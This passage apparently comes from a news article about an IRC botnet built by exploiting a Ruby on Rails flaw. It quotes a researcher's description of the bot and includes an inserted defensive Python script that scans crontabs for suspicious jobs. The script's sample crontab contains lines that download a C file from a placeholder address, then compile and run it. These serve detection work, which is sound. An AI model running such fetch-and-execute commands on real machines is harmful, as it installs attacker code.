A critical vulnerability in the Web application development framework Ruby on Rails is being exploited by hackers to compromise servers and build a botnet.
“This vulnerability was the subject of much discussion, and an emergency RoR advisory back in January,” he said in his blog. “It’s pretty surprising that it’s taken this long to surface in the wild, but less surprising that people are still running vulnerable installations of Rails.”
The exploit, he said, adds a scheduled task on Linux machines that executes a series of commands.
The commands download a malicious C source file from a remote server. The malware connects to an Internet Relay Chat (IRC) server and joins a channel where it receives commands from the attackers.
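For administrators checking a server for the scheduled task described above, the following added example (not code from the article or from the researcher) scans crontab text for jobs that download a C source file or invoke a C compiler. The patterns, function names and sample crontab are assumptions constructed for illustration, not indicators taken from the actual attack.

```python
import re

# Heuristics below are assumptions drawn from the article's description (a cron
# job that downloads a C source file); they are not signatures of the real bot.
JOB = re.compile(r"^(?:@\w+|(?:\S+\s+){4}\S+)\s+(?P<cmd>.+)$")
ENV = re.compile(r"^[A-Za-z_]\w*\s*=")            # e.g. MAILTO=root
DOWNLOADER = re.compile(r"(?:^|[\s;|&/])(?:wget|curl)\s")
COMPILER = re.compile(r"(?:^|[\s;|&/])(?:gcc|cc|clang)\s")
C_SOURCE = re.compile(r"\S+\.c(?=$|[\s;|&'\"])")  # token ending in ".c"


def cron_command(line):
    """Return the command part of a crontab line, or None if it is not a job."""
    line = line.strip()
    if not line or line.startswith("#") or ENV.match(line):
        return None
    m = JOB.match(line)
    return m.group("cmd") if m else None


def suspicious_jobs(crontab_text):
    """Return [(line_number, [reasons])] for jobs worth a closer look."""
    findings = []
    for number, line in enumerate(crontab_text.splitlines(), start=1):
        cmd = cron_command(line)
        if cmd is None:
            continue
        reasons = []
        if DOWNLOADER.search(cmd) and C_SOURCE.search(cmd):
            reasons.append("downloads a C source file")
        if COMPILER.search(cmd):
            reasons.append("runs a C compiler")
        if reasons:
            findings.append((number, reasons))
    return findings


# Constructed sample crontab (documentation addresses, not real indicators).
SAMPLE = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
*/1 * * * * wget -q http://203.0.113.7/a.c -O /tmp/a.c
@reboot cd /tmp; gcc -o a a.c; ./a
15 4 * * 0 curl -s https://example.invalid/health.conf -o /etc/app/health.conf
"""

if __name__ == "__main__":
    for number, reasons in suspicious_jobs(SAMPLE):
        print(f"line {number}: {', '.join(reasons)}")
```

Run it against the output of `crontab -l` for each account, including the one the Rails application runs as; a hit is a prompt for manual review, not proof of compromise.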
Jarmoc described the exploit as a “pretty straightforward skiddy exploit.”
“Functionality is limited, but it includes the ability to download and execute files as commanded, as well as changing servers,” he said. “There’s no authentication performed, so an enterprising individual could hijack these bots fairly easily by joining the IRC server and issuing the appropriate commands.”